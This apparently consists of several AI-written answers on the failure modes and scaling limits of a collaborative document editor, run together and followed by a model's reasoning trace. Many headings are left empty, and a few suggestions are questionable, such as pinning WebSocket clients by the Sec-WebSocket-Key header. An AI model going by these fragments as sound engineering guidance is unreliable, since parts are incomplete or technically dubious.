httpOnly cookies cannot be accessed by JavaScript, making them immune to XSS theft. Set the SameSite=Lax (or Strict) attribute to help mitigate CSRF attacks. Since this is an API that should only be called by your own frontend, you should also implement CSRF tokens if you are using cookies. Trade-offs:
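For illustration, the attributes such a cookie needs can be assembled by hand (the helper name is hypothetical); in practice a framework like Express sets these via its cookie options:

```javascript
// Build a Set-Cookie header value for a session cookie.
// HttpOnly blocks JavaScript access (XSS theft), Secure restricts it to
// HTTPS, and SameSite limits cross-site sends (CSRF mitigation).
function buildSessionCookie(name, value, maxAgeSeconds) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    `Max-Age=${maxAgeSeconds}`,
    'Path=/',
    'HttpOnly',
    'Secure',
    'SameSite=Lax'
  ].join('; ');
}
```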
Issue: Caching API Responses for 5 Minutes
Caching any authenticated API responses at a CDN level is extremely dangerous. A user's GET /documents/123 response must never be cached and served to another user.
Solution: Do Not Cache Authenticated API Responses in CloudFront
Ensure Cache-Control: private, no-cache, no-store headers are set on all authenticated responses. Alternatively, do not route API traffic through CloudFront at all; use the load balancer directly. Trade-offs:
Issue: Server-Centric WebSocket Connections If a user's API server crashes or is taken down for deployment, all its WebSocket connections are abruptly terminated. The client's React SPA will have to reconnect, but with round-robin LB, it will likely connect to a different server. The new server has no inherent knowledge of the user's previous connection state.
Solution: Use Redis to Store WebSocket Session State
Implement a Sticky Session Load Balancer Policy:
| Component | Original Flaw | Proposed Solution | Key Benefit |
|---|---|---|---|
| Conflict Resolution | LWW + Client Clocks | OT, CRDT, or Server Sequence Numbers | Prevents data loss |
| Real-Time Sync | Server Islands + DB Polling | Redis/Kafka Pub/Sub | True real-time sync, enables scaling |
| Storage | Full HTML Snapshots | Event Sourcing + Occasional Snapshots | Reduces I/O, enables history |
| Auth | JWT in localStorage | JWT in httpOnly + SameSite Cookie | Mitigates XSS attacks |
| CDN | Cached API responses | No API caching on CDN | Prevents data leakage |
| WebSockets | Server-local state | Sticky Sessions + Redis Session Store | Handles server failures gracefully |
Implementing these changes would transform the architecture from a fundamentally broken design into a robust, scalable, and secure system suitable for a real-time collaborative editor.
Cross-Server Sync Delay (Polling Bottleneck)
Unreliable Conflict Resolution (Client Timestamps)
Data Loss Risk with Snapshots
JWT Security in localStorage
Stale CDN Caching: bypass stale caches with versioned URLs (e.g., /api/doc?id=1&v=123).
Stateless Load Balancing with WebSockets: pin clients to servers via the Sec-WebSocket-Key header or IP hashing.
Read Replica Lag
Hotspots in Document Partitioning: use a composite key (org_id + doc_id_hash) or dynamic resharding.
Race Conditions in Snapshot Saves: use optimistic concurrency (UPDATE ... WHERE version = X).
High Database Load from Polling
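The "UPDATE ... WHERE version = X" pattern is compare-and-set. An in-memory sketch (names assumed) shows why a stale snapshot save is rejected instead of silently overwriting:

```javascript
// Optimistic concurrency: a save succeeds only if the stored version still
// matches the version the writer read. Mirrors UPDATE ... WHERE version = X.
class VersionedStore {
  constructor() {
    this.docs = new Map(); // docId → { content, version }
  }

  read(docId) {
    return this.docs.get(docId) || { content: '', version: 0 };
  }

  // Returns true on success; false means a concurrent writer won the race.
  save(docId, content, expectedVersion) {
    const current = this.read(docId);
    if (current.version !== expectedVersion) return false; // stale write rejected
    this.docs.set(docId, { content, version: expectedVersion + 1 });
    return true;
  }
}
```

A rejected writer re-reads the current version and retries (or merges), which is exactly what checking the affected-row count of the UPDATE gives you in SQL.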
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in your architecture, along with proposed solutions and trade-offs:
Problem: Clients connected to different API servers won’t receive real-time updates from each other due to isolated WebSocket connections per server. Polling PostgreSQL every 2 seconds introduces latency (up to 2s sync delay).
Solution:
Problem: Client clocks are unreliable (can drift or be maliciously set), leading to data loss if a stale edit has a later timestamp.
Solution:
Problem: Polling every 2s scales poorly (N servers × M documents → high DB load).
Solution:
Problem: Storage bloat (especially for large documents) and expensive snapshotting under high load.
Solution:
Problem: Storing JWTs in localStorage makes them vulnerable to XSS attacks.
Solution:
Problem: Stale document data if cached API responses don’t reflect real-time edits.
Solution:
Problem: High write load during peak editing (all changes hit the primary DB).
Solution:
Problem: A single server handling too many WebSocket connections (memory/CPU limits).
Solution:
Problem: If WebSockets fail, the UI may freeze (no fallback).
Solution:
Problem: Hot partitions if some orgs are much more active.
Solution:
Problem: Session cache loss if Redis fails.
Solution:
Each solution balances performance, complexity, and reliability. The highest-priority fixes are WebSocket fragmentation (Pub/Sub) and LWW conflicts (server timestamps).
Here’s a comprehensive analysis of failure modes, race conditions, and scaling bottlenecks in the proposed architecture, along with specific solutions and trade-offs.
Solution: Use a Pub/Sub system (Redis Pub/Sub or dedicated message broker like Kafka) for cross-server real-time notifications.
Solution: Use server-generated monotonic timestamps (logical clocks or hybrid logical clocks) or adopt Operational Transformation (OT) / Conflict-Free Replicated Data Types (CRDTs).
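A compact sketch of one of the options named here, a hybrid logical clock: timestamps combine wall time with a logical counter, so ordering survives clock skew. This is a simplified illustration, not a production implementation; `now` is injectable for testing:

```javascript
class HLC {
  constructor(now = () => Date.now()) {
    this.now = now;
    this.wall = 0;
    this.logical = 0;
  }

  // Timestamp a local or send event.
  tick() {
    const t = this.now();
    if (t > this.wall) {
      this.wall = t;
      this.logical = 0;
    } else {
      this.logical += 1; // wall clock stalled or went backwards
    }
    return { wall: this.wall, logical: this.logical };
  }

  // Merge a timestamp received from another node.
  receive(remote) {
    const t = this.now();
    const maxWall = Math.max(t, this.wall, remote.wall);
    if (maxWall === this.wall && maxWall === remote.wall) {
      this.logical = Math.max(this.logical, remote.logical) + 1;
    } else if (maxWall === this.wall) {
      this.logical += 1;
    } else if (maxWall === remote.wall) {
      this.logical = remote.logical + 1;
    } else {
      this.logical = 0;
    }
    this.wall = maxWall;
    return { wall: this.wall, logical: this.logical };
  }
}
```

Comparing (wall, logical) pairs lexicographically gives a total order that respects causality even when a client's wall clock is wrong.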
Solution:
Solution: Store delta-based changes with periodic snapshots (e.g., every 100 changes or 5 minutes). Use event sourcing: store all operations, reconstruct document from log.
Solution: Only cache static assets in CDN. For API, use Redis cache with fine-grained invalidation (per document ID). Alternatively, use short-lived CDN TTL (e.g., 5 seconds) and soft purge on update.
Solution: Store JWT in httpOnly cookies (secure, sameSite strict) and implement sliding session renewal via refresh tokens (stored server-side in Redis). Use CSRF tokens for state-changing operations.
Solution: Use load balancer with sticky sessions (e.g., hash based on user ID or session ID) for WebSocket connections. For health checks, ensure WebSocket endpoints are monitored.
Polling load grows with server count (O(n)); this can overwhelm the database with redundant queries.
Solution: Replace polling with database triggers + a notification system (e.g., PostgreSQL LISTEN/NOTIFY) or use change data capture to push changes to a message queue that servers subscribe to.
Trade-off: LISTEN/NOTIFY has limited message payload size and no persistence.
Solution: Implement read-after-write consistency by:
Solution:
Solution: Implement client-side queue with versioning and server-assigned document version numbers. On reconnect, replay queued operations if the base version still matches; otherwise, require merge/resolve.
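The version-checked replay described here can be sketched as a small client-side queue (class and field names are assumptions):

```javascript
// Queue ops tagged with the document version they were based on. On
// reconnect, replay only if the server is still at that version;
// otherwise surface a conflict that needs merge/resolve.
class VersionedOpQueue {
  constructor(baseVersion) {
    this.baseVersion = baseVersion;
    this.queue = [];
  }

  enqueue(op) {
    this.queue.push({ ...op, baseVersion: this.baseVersion });
  }

  // serverVersion comes from the server's reconnect handshake.
  drain(serverVersion) {
    if (serverVersion !== this.baseVersion) {
      return { status: 'conflict', ops: this.queue }; // needs merge/resolve
    }
    const ops = this.queue;
    this.queue = [];
    return { status: 'replay', ops };
  }
}
```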
Solution: Integrate APM tools (e.g., Datadog, New Relic) for Node.js servers, track WebSocket connections per server, message latency, and end-to-end sync delay. Use structured logging for operations.
Each solution involves a trade-off between complexity, performance, and user experience, but addressing these issues will significantly improve system reliability and scalability.
Issue: Each server only broadcasts to its own WebSocket clients → users connected to different servers won't see real-time updates from each other.
Solution: Use Redis Pub/Sub for cross-server WebSocket broadcasting
// When server receives change:
redis.publish(`doc:${docId}`, changeEvent);
// All servers subscribe to channel:
redis.subscribe(`doc:${docId}`, (change) => broadcastToLocalClients(change));
Trade-off: Adds network hop latency (~1-2ms), requires Redis cluster for high availability
Issue: Last-write-wins using client timestamps is fundamentally broken
Solution: Use server-generated monotonic sequence numbers
-- PostgreSQL sequence per document:
CREATE SEQUENCE doc_123_version_seq;
-- Each change: nextval('doc_123_version_seq')
Trade-off: Requires database round-trip before broadcasting (~5-10ms added latency)
Issue: 2-second polling interval across all servers will overwhelm database at scale
Solution: Replace polling with PostgreSQL LISTEN/NOTIFY
-- Server listens for document changes:
LISTEN doc_changes_123;
-- On change:
NOTIFY doc_changes_123, '{"version": 456}';
Trade-off: PostgreSQL connection limit (~500-1000 connections), requires connection pooling strategy
Issue: Saving entire document every 30 seconds wastes storage/bandwidth
Solution: Operational Transform (OT) or Conflict-free Replicated Data Types (CRDTs)
// Store operations instead of full HTML:
{
"op": "insert",
"pos": 42,
"text": "new text",
"version": 123
}
Trade-off: Complex implementation, requires operation history cleanup strategy
Issue: localStorage vulnerable to XSS attacks
Solution: HttpOnly cookies + CSRF tokens
Set cookies with the httpOnly; secure; sameSite=strict flags
// Frontend includes CSRF token in headers
axios.defaults.headers.common['X-CSRF-Token'] = getCSRFToken();
Trade-off: More complex auth flow, requires sticky sessions or JWT in cookies
Issue: Caching API responses for 5 minutes breaks real-time collaboration
Solution:
Set Cache-Control: no-store on document API responses
Use ETag validation for conditional requests (If-None-Match: "version123")
Issue: Server crash loses all WebSocket connections
Solution:
// Client-side reconnection:
function reconnect() {
const delay = Math.min(1000 * 2 ** attempts, 30000);
setTimeout(connectWebSocket, delay);
}
Trade-off: Sticky sessions reduce load distribution effectiveness
Issue: Partitioning only by organization ID leads to hotspots
Solution: Composite partitioning key
-- Partition by (organization_id, document_id_hash)
PARTITION BY HASH (organization_id, document_id)
Trade-off: More complex queries for cross-organization operations (admin views)
Issue: Last-write-wins loses intermediate changes
Solution: Implement Operational Transform (OT) with central server sequencing
// Server as single sequencer:
class OTServer {
applyOperation(doc, operation) {
const transformed = OT.transform(operation, this.pendingOps);
this.history.push(transformed);
return transformed;
}
}
Trade-off: Significant implementation complexity, requires undo/redo handling
Issue: Single points of failure in each component
Solution: Multi-AZ deployment with failover
Component Redundancy Strategy
------------- --------------------
PostgreSQL Multi-AZ RDS with read replicas
Redis Redis Cluster (6 nodes, 3 primaries / 3 replicas)
WebSocket Redis Pub/Sub + auto-scaling group
Load Balancer Multi-AZ ALB/NLB
Trade-off: 2-3x higher infrastructure cost
Issue: No visibility into system health
Solution: Implement observability stack
# SLO example:
availability: 99.95% over 30 days
latency: p95 < 200ms for document operations
Trade-off: Operational overhead, but essential for production
Immediate Fixes (Week 1):
Short-term (Month 1):
Long-term (Quarter 1):
This architecture can support ~10,000 concurrent editors with these changes, scaling to ~100,000 with additional Redis clustering and database optimization.
We need to analyze the given architecture for a real-time collaborative document editor, similar to Google Docs. The description includes components, data flow, sync strategy, and scaling plan. We are asked to identify potential failure modes, race conditions, and scaling bottlenecks. For each issue, propose a specific solution with trade-offs.
We need to be thorough: consider each component and interaction. The architecture seems to have several potential issues: WebSocket connections per server, broadcast only to clients connected to that server, other servers polling PostgreSQL every 2 seconds, conflict resolution using client timestamps, JWT in localStorage, snapshot storage, etc.
Let's break it down:
Components:
Data Flow:
Scaling Plan:
Now, we need to identify issues:
Potential Failure Modes: These are scenarios where the system may fail to operate correctly, such as data loss, inconsistency, unavailability, security issues, etc.
Race Conditions: Situations where the outcome depends on the sequence or timing of events, leading to unexpected behavior.
Scaling Bottlenecks: Points where the system cannot scale efficiently as load increases.
We'll go through each aspect.
Data flow: When a user types, change is sent via WebSocket to the server they are connected to (say Server A). Server A writes to PostgreSQL and broadcasts to all clients connected to Server A. Other servers (B, C) poll PostgreSQL every 2 seconds for changes, and then presumably they broadcast to their own clients. So eventually all clients receive updates, regardless of which server they are connected to, because other servers will pick up changes from DB and broadcast to their clients. So server affinity is not required for correctness. However, there is a delay: up to 2 seconds for cross-server propagation. That might be acceptable for some collaborative editing but not ideal. Also, if a client disconnects and reconnects, it may get a different server, but that's okay.
Potential failure modes:
Single point of failure: Load balancer? Usually load balancers can be made highly available. But if it fails, no new connections can be established. But existing WebSocket connections might still be alive if they bypass the LB? Usually LB is in front, so if LB fails, all connections go down. So need HA.
WebSocket server failure: If a server crashes, all its WebSocket connections are lost. Clients need to reconnect. Their unsent changes? Possibly they were in flight. The server might have written some changes to DB before crashing, but changes not yet written could be lost. Also, the server's broadcast might not have reached all its clients. However, because other servers poll DB, they might eventually get the changes that were persisted. But if the server crashed before writing to DB, the change is lost. Need to ensure durability.
Load balancer not WebSocket-aware: Some LBs may not handle WebSocket upgrade properly. But we assume it does.
Race Conditions:
Let's think deeper.
The architecture uses last-write-wins with client timestamps. This is problematic because client clocks cannot be trusted; they may be out of sync, or malicious users could set their clock forward to always win. Also, network delays can cause ordering issues. This is a classic issue: using client timestamps for conflict resolution leads to inconsistencies and potential data loss. Need a better approach like Operational Transform (OT) or Conflict-free Replicated Data Types (CRDTs), or using a central server with logical timestamps (e.g., vector clocks, sequence numbers). The trade-off is increased complexity.
Also, the polling interval of 2 seconds introduces a delay in cross-server propagation. For real-time collaboration, 2 seconds might be noticeable. But it could be acceptable for some use cases, but ideally we'd want lower latency. The delay also increases the chance of conflicts because users on different servers may not see each other's changes for up to 2 seconds.
Race condition: Two users on different servers edit same paragraph at nearly same time. Both servers receive the changes, write to DB, and broadcast to their own clients. The writes to DB: if they are updating the same field (e.g., paragraph content) with a timestamp, the second write (based on DB commit time) will overwrite the first, regardless of timestamp. Then when the other server polls, it will see the second write (maybe) and broadcast to its clients. But the first server's clients already saw the first change locally, and now they might receive the second change via polling? Actually, the first server broadcasted the first change to its clients. Then later, when it polls DB, it might see the second change (if it's later) and broadcast to its clients, overwriting the first. But the order of application may cause flickering or lost edits. If conflict resolution is done at client side, similar issues.
Better to use a log of operations with server-assigned sequence numbers, and each client applies operations in order. That's the typical approach (OT/CRDT). The trade-off is complexity.
Polling PostgreSQL every 2 seconds for changes from all servers. As number of servers increases, each server polls, causing load on DB. If many servers (say 100), each polling every 2 seconds, that's 50 queries per second per server? Actually, 100 servers * 0.5 Hz = 50 queries per second. That's not huge, but each query may scan for recent changes. If the changes table is large, scanning could be expensive. They might use a "last_updated" timestamp or a sequence ID. Still, polling can be inefficient. Alternative: use a message queue or pub/sub (like Redis Pub/Sub) to broadcast changes between servers in real-time, eliminating polling delay and reducing DB load. Trade-off: adds another component, but improves latency and scalability.
Also, the polling interval of 2 seconds means that changes are not immediately propagated across servers, causing a lag. For a collaborative editor, sub-second latency is desirable.
When a server receives a change, it broadcasts to its own clients. That's fine. But for clients on other servers, they rely on polling. So if a server receives a change, it doesn't immediately notify other servers; they have to wait up to 2 seconds. This increases latency for cross-server updates. Also, if a server crashes after broadcasting to its clients but before writing to DB? Actually, step 2: Server writes change to PostgreSQL, then step 3: broadcasts. So the write to DB is before broadcast. So if the write is successful, the change is persisted, and then broadcasted. If the server crashes after broadcast but before DB commit? Actually, order is important: they write then broadcast. But if the write fails, presumably they wouldn't broadcast. So the DB is the source of truth. Then other servers will eventually poll and get the change. So the local broadcast is an optimization for low latency for clients on the same server. However, if the server fails after write but before broadcast, the local clients won't get the change, but they might get it later via polling when they reconnect to another server? Actually, if the server crashes, its clients lose connection. They will reconnect to another server, and that server will poll DB and send the latest state. So the change is not lost. But there is a period where the user who made the change might not see it confirmed if the server crashes before broadcasting back to the originating client? The client might have sent the change and expects an echo or confirmation. If the server crashes before sending the broadcast, the client might not receive acknowledgment. It might resend, causing duplication. So need idempotency.
Documents saved as full HTML snapshots every 30 seconds. This means that changes are written to PostgreSQL presumably as incremental updates, but every 30 seconds a snapshot is taken. The snapshots could be used for recovery or for loading documents quickly. However, if the system only stores snapshots and not a log of operations, it's hard to reconstruct the document at arbitrary points for collaboration. The description says "Sync Strategy: Last-write-wins with timestamps from client clocks." This suggests that the document is stored as a set of paragraphs with timestamps, and each change updates the paragraph. The snapshot might be the full HTML of the document. But if we only have snapshots every 30 seconds, we risk losing changes if a crash occurs between snapshots. However, the changes are also written to PostgreSQL (presumably as updates to the document). But if they are writing each change directly to the document record, then the document is always up-to-date in the DB (except for replication lag). The snapshot might be a backup or for versioning. But the description: "Storage: Documents saved as full HTML snapshots every 30 seconds." Could be that the primary storage is the snapshot, and changes are applied to the snapshot in memory? Actually, we need to interpret: It says "Storage: Documents saved as full HTML snapshots every 30 seconds." That might mean that the document is persisted only every 30 seconds, not after each change. But step 2 says "Server writes change to PostgreSQL". So maybe they write each change to a changes table, and periodically create a snapshot from the log. That is common: store operations, and periodically compact into a snapshot. But the description is ambiguous. We'll assume they store each change in PostgreSQL, and also periodically save snapshots for faster loading. That's fine.
Residual failure: if snapshotting falls behind, the change log between snapshots grows and recovery (load snapshot, replay log) slows down. Manageable with bounded compaction intervals.
JWT tokens with 24-hour expiry stored in localStorage. This is a security concern: localStorage is vulnerable to XSS attacks. If an attacker can inject JavaScript, they can steal the token. Better to use HttpOnly cookies for storing tokens, but then need to handle CSRF protection. Trade-off: localStorage is easier for SPAs but less secure. Using cookies with HttpOnly and Secure flags is more secure but requires CSRF tokens or SameSite attributes. Also, JWT expiry 24 hours is long; could be shortened and use refresh tokens.
The listed "Redis for session cache" sits oddly next to stateless JWTs: a self-contained JWT needs no server-side session unless the system wants revocation, in which case Redis is a reasonable place for a token denylist. That usage is fine; it just should be stated explicitly.
Potential failure: If the token is stolen, an attacker can impersonate the user until expiry. Mitigation: use short-lived tokens and refresh tokens with rotation.
The CDN "also caches API responses for 5 minutes." For a collaborative editor, most API responses are user- or document-specific and change constantly; a cached GET /document/{id} can serve five-minute-old content to a user whose collaborator is typing right now. Dynamic endpoints should send Cache-Control: no-store (or private, no-cache) so the CDN caches only static assets. If the intent was static-assets-only caching, the configuration as described is a bug worth flagging.
Scaling plan: Horizontal scaling by adding more API servers, database read replicas for read-heavy operations, document partitioning by organization ID.
Potential bottlenecks:
Write scalability: a single PostgreSQL primary takes every write. "Document partitioning by organization ID" could mean declarative table partitioning inside one instance — which helps with index size and maintenance but does nothing for write throughput across machines — or true sharding across separate database clusters, which does scale writes but is far harder (routing, cross-shard queries, rebalancing). The plan does not say which; as stated, all writes still funnel into one primary.
Polling load: As number of servers grows, polling load increases linearly. Could be mitigated with a message bus.
WebSocket connections per server: Node.js can handle many WebSocket connections, but there is a limit per server (memory, file descriptors). Horizontal scaling helps.
Redis for session cache: Redis can be a bottleneck if heavily used. But it's in-memory and can be clustered.
Because each server broadcasts changes to its own clients and others poll, there is eventual consistency with up to 2 seconds delay. For collaborative editing, this may be acceptable but not ideal. Also, conflict resolution via client timestamps can lead to inconsistent final states if clocks are skewed. Need to consider stronger consistency models.
If a server becomes partitioned from the database, it cannot persist edits; as designed it would simply fail the write and leave the client hanging. It should either fail fast to the client (reject the edit with a retryable error) or queue locally with idempotent replay, rather than silently dropping the change.
Concurrent updates to the same paragraph are a classic lost-update race. Server A reads the paragraph at timestamp T1 and applies a client change stamped T2 > T1; Server B, having read the same T1 state, applies a change stamped T3 > T1. If T3 < T2 but B commits after A, B's blind write overwrites A's newer content and A's change is lost. The fix is a conditional update (compare-and-set): UPDATE ... SET content, ts WHERE ts < incoming_ts. Because the WHERE clause is evaluated against the row's current value at write time, the loser of the race affects 0 rows instead of clobbering the winner; whichever change carries the higher timestamp wins regardless of commit order. The architecture only says "writes change to PostgreSQL," which reads as a plain unconditional UPDATE — so the race exists as described.
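A small sketch of that compare-and-set behavior (Python simulation of the row; in PostgreSQL this would be a single `UPDATE ... WHERE ts < incoming_ts`, with the hypothetical `Paragraph` class standing in for the table row):

```python
# Sketch: conditional (compare-and-set) update that refuses to overwrite a
# newer timestamp, preventing the lost-update race described above.
class Paragraph:
    def __init__(self, content, ts):
        self.content, self.ts = content, ts

    def conditional_update(self, content, incoming_ts):
        # Analogous to: UPDATE paragraphs SET content = %s, ts = %s
        #               WHERE id = %s AND ts < %s
        if incoming_ts <= self.ts:
            return False  # 0 rows affected: a newer write already landed
        self.content, self.ts = content, incoming_ts
        return True

p = Paragraph("v1", ts=100)
assert p.conditional_update("from A", 120) is True   # newer stamp, applied
assert p.conditional_update("from B", 110) is False  # older stamp, rejected
assert p.content == "from A"
```

Callers whose update affects zero rows re-read the row and decide whether to retry or drop the change.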
Client timestamps can be arbitrarily wrong. A malicious user could set their clock far ahead to always win conflicts. This is a security issue. Need to use server-generated timestamps or logical clocks.
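One logical-clock alternative is a Lamport clock, sketched below (illustrative Python; the class name and API are assumptions, not part of the described system). Ordering then depends only on observed causality, so a user cannot win conflicts by setting their wall clock ahead:

```python
# Sketch: a Lamport logical clock as a replacement for client wall clocks.
class LamportClock:
    def __init__(self):
        self.time = 0

    def tick(self):                  # local event (e.g. a keystroke)
        self.time += 1
        return self.time

    def receive(self, remote_time):  # merge on receiving a remote operation
        self.time = max(self.time, remote_time) + 1
        return self.time

a, b = LamportClock(), LamportClock()
t1 = a.tick()         # a edits first
t2 = b.receive(t1)    # b observes a's edit, so b's clock jumps past t1
t3 = b.tick()         # b's next edit is ordered after what it has seen
assert t1 < t2 < t3   # causal order holds regardless of wall-clock settings
```

Lamport clocks give a total order consistent with causality but cannot detect concurrency; if the system also needs to know "these two edits were concurrent," vector clocks or a CRDT are the next step.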
If snapshots are taken every 30 seconds, and the system crashes right before a snapshot, the last snapshot might be old. But if changes are logged, recovery can replay logs. However, if they rely solely on snapshots and not a persistent log, they could lose data. The description says "Server writes change to PostgreSQL", so changes are persisted. Snapshots are just periodic dumps. So that's okay.
Round-robin is fine for initial assignment, but if the load balancer does not support WebSocket persistence, it may route subsequent HTTP requests to different servers, which might be okay if the application uses tokens and stateless servers. However, for WebSocket, the upgrade request is just an HTTP request, so the LB can route it to a server, and then the TCP connection stays with that server. That's typical. So not a problem.
Redis is used for session cache. If Redis fails, sessions might be lost, and users may need to re-authenticate. Could be mitigated with replication and failover. But it's a potential single point of failure.
As mentioned, caching dynamic data is problematic. Also, if the CDN caches API responses that are supposed to be real-time, it breaks the collaborative experience. They should not cache API responses for the document endpoints, or at least use cache-control: no-cache. They might be caching static assets only, but they said "also caches API responses for 5 minutes." That is likely a mistake.
Broadcast fan-out: sending one change to every connected client is O(clients) per change. Since each server only serves its own connections, the total fan-out cost is naturally spread across servers, and round-robin keeps a popular document's collaborators distributed. The residual risks are a single server blocking its event loop when it must push to thousands of sockets, and the polling loop remaining the only cross-server path. A shared pub/sub layer (e.g. Redis) that fans changes out to every server, each of which then pushes to its own clients, fixes the cross-server latency and removes the polling entirely.
Polling every 2 seconds is neither real-time nor cheap: the read load grows linearly with the server count. PostgreSQL LISTEN/NOTIFY can push change notifications to each server's listening connection, eliminating the poll loop and the 2-second latency, though NOTIFY payloads are small and the mechanism has scaling limits of its own at high fan-out. A dedicated message bus (Redis Pub/Sub, RabbitMQ, Kafka) is the more scalable option at the cost of another component.
Partitioning by organization ID helps distribute data. But if some organizations have huge numbers of documents and heavy editing, they may still be a hotspot. Need to consider further sharding.
Server crash and in-memory state: changes hit the database before broadcast, so persisted state is safe, but the flow never specifies an acknowledgment to the originating client. A client whose server dies between the DB write and the broadcast sees no confirmation, may resend on reconnect, and duplicates the change. Idempotent operations keyed by client-generated IDs make the resend harmless.
WebSocket connections are persistent and may need to be authenticated. Typically, the connection starts with an HTTP request containing the JWT. The server validates the token and upgrades. If the token expires during the connection, the server should close the connection or request re-authentication. With 24-hour expiry, it's less likely but still possible. Need to handle token refresh via a separate API call, and possibly re-establish WebSocket.
Now, let's list the issues systematically.
We'll categorize:
Real-time Sync and Conflict Resolution
Database Polling
WebSocket and Load Balancing
Data Storage and Snapshots
Authentication and Security
Scalability Bottlenecks
Consistency and Fault Tolerance
We'll produce a list of specific issues with solutions and trade-offs.
Let's think of more nuanced issues:
Issue: Client clock skew leading to unfair conflict resolution. Solution: Use server-generated timestamps or logical clocks (e.g., vector clocks, sequence numbers). Trade-off: Increases server load and complexity.
Issue: Lost updates due to concurrent writes without conditional checks. Solution: Use optimistic concurrency control with version numbers (e.g., incrementing version per document or per paragraph). Trade-off: Requires reading before writing, and handling failed updates (retry). Could also use Operational Transform or CRDTs for collaborative editing, which are more robust but complex.
Issue: Polling for changes introduces up to 2 seconds latency for cross-server updates. Solution: Replace polling with a pub/sub system (e.g., Redis Pub/Sub, Kafka, or PostgreSQL NOTIFY) to push changes between servers in real-time. Trade-off: Adds complexity and new components, but reduces latency and DB load.
Issue: Database polling every 2 seconds by each server can cause high load on DB as number of servers grows. Solution: Use a message bus as above, or batch polling, or increase polling interval, but best is pub/sub. Trade-off: same.
Issue: Single point of failure at load balancer. Solution: Deploy multiple load balancers with DNS round-robin or anycast, or use cloud provider's managed LB with HA. Trade-off: Cost, complexity.
Issue: WebSocket server failure may cause clients to lose connection and unsent changes if not acknowledged. Solution: Implement client-side buffering and retry with idempotent operation IDs. On server side, ensure changes are persisted before acknowledging to client. Use heartbeats to detect failure quickly. Trade-off: Client code complexity, potential duplicate operations.
Issue: JWT stored in localStorage vulnerable to XSS. Solution: Store JWT in HttpOnly cookie with Secure and SameSite=Strict. Use CSRF tokens. Trade-off: More complex to implement, but more secure. Also, cookies are sent automatically, which could be a risk for CSRF; but SameSite and CSRF tokens mitigate.
Issue: CDN caching API responses for 5 minutes leads to stale data. Solution: Configure CDN to not cache dynamic API responses, or use appropriate Cache-Control headers (no-cache, private). Trade-off: Increased load on origin servers but ensures freshness.
Issue: Horizontal scaling of writes to PostgreSQL is limited. Solution: Shard the database by organization ID across multiple PostgreSQL instances or use a distributed database like CockroachDB. Trade-off: Increased operational complexity, potential cross-shard queries harder.
Issue: Redis as session cache single point of failure. Solution: Use Redis Cluster or sentinel for high availability. Trade-off: More complex setup.
Issue: broadcast cost on a single server. Pushing a change to every local client of a document is O(clients on that server), which Node.js handles fine at moderate counts with non-blocking sends. Because round-robin spreads a popular document's collaborators across servers, no single server should bear the whole fan-out. For larger scale, the standard pattern is a pub/sub adapter (e.g. Socket.IO with its Redis adapter): each server subscribes to per-document channels and relays to its own sockets, which both distributes fan-out and replaces polling. Trade-off: another moving part, and Redis becomes part of the real-time critical path.
Issue: Polling interval may cause merge conflicts to be more frequent because users don't see others' changes quickly. Solution: Reduce polling interval, but that increases DB load. Use pub/sub to push changes instantly.
Issue: Using full HTML snapshots every 30 seconds could be inefficient if documents are large and changes are small. Solution: Store incremental changes (operational transforms) and rebuild snapshots asynchronously. Trade-off: More complex but saves storage and I/O.
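The op-log-plus-compaction idea can be sketched as follows (illustrative Python; `OpLog` is a hypothetical structure, and real operations would be positional edits rather than plain appends):

```python
# Sketch: store small incremental operations and compact them into a snapshot
# asynchronously, instead of writing full HTML every 30 seconds.
class OpLog:
    def __init__(self):
        self.snapshot = ""   # last compacted state
        self.ops = []        # operations since the snapshot

    def append(self, text):
        self.ops.append(text)

    def materialize(self):   # current document = snapshot + replayed ops
        return self.snapshot + "".join(self.ops)

    def compact(self):       # periodic background job
        self.snapshot = self.materialize()
        self.ops.clear()

log = OpLog()
log.append("Hello, ")
log.append("world")
assert log.materialize() == "Hello, world"
log.compact()                              # snapshot absorbs the ops
assert log.ops == [] and log.snapshot == "Hello, world"
```

Loading a document then costs one snapshot read plus a short replay, and the heavy snapshot writes move off the edit path into a background worker.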
Issue: Round-robin load balancing may not account for server load, leading to uneven distribution. Solution: Use load-aware LB (e.g., least connections, CPU). Trade-off: More sophisticated LB.
Issue: No mention of monitoring, logging, or alerting. But not asked.
Now, we need to produce a comprehensive answer listing each potential failure mode, race condition, and scaling bottleneck, with specific solutions and trade-offs.
We should structure the answer clearly. Possibly group related issues.
Let's outline:
Real-time Sync Issues
Database Polling Scalability
WebSocket and Load Balancer Failure Modes
Authentication and Security
Data Storage and Snapshots
Scalability Bottlenecks
Consistency and Partition Tolerance
Other Race Conditions
Problem: Polling with a time window may miss changes if they are made exactly at the boundary, or may fetch duplicates. Solution: Store changes with an auto-increment ID, and each server tracks last processed ID. Trade-off: Requires additional bookkeeping.
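A sketch of that cursor-based change feed (illustrative Python; the in-memory `changes` list stands in for a changes table with an auto-increment id column):

```python
# Sketch: polling by monotonically increasing change ID instead of timestamp
# windows, so no change is missed or fetched twice at window boundaries.
changes = []   # stand-in for a changes table with an auto-increment id

def write_change(text):
    changes.append({"id": len(changes) + 1, "text": text})

def poll(last_seen_id):
    """Return changes after the cursor plus the new cursor position."""
    fresh = [c for c in changes if c["id"] > last_seen_id]
    new_cursor = fresh[-1]["id"] if fresh else last_seen_id
    return fresh, new_cursor

write_change("a")
write_change("b")
batch, cursor = poll(0)
assert [c["text"] for c in batch] == ["a", "b"] and cursor == 2
batch, cursor = poll(cursor)   # nothing new: no duplicates re-fetched
assert batch == [] and cursor == 2
```

Each server persists only its own cursor; the query itself (`WHERE id > $cursor ORDER BY id`) is an index range scan, so it stays cheap as the table grows.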
Now, we need to produce a final answer that lists these issues and solutions.
The instruction: "Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs."
We should produce a list, perhaps bullet points or numbered, each with a clear description, problem, solution, trade-off.
We can group but ensure each issue is distinct.
Let's compile a comprehensive list:
Potential Failure Modes (system may fail or behave incorrectly):
Client clock skew causing unfair conflict resolution: Clocks may be out of sync; malicious users can set clock ahead to always win. Solution: Use server-assigned timestamps or sequence numbers. Trade-off: Adds latency (need to get timestamp from server) and requires coordination; but ensures fairness and consistency.
Lost updates due to concurrent writes without concurrency control: Two servers may overwrite each other's changes. Solution: Use optimistic concurrency control with version numbers (e.g., increment version on each update, check before write). Trade-off: Requires reading before writing, handling retries, may increase DB load.
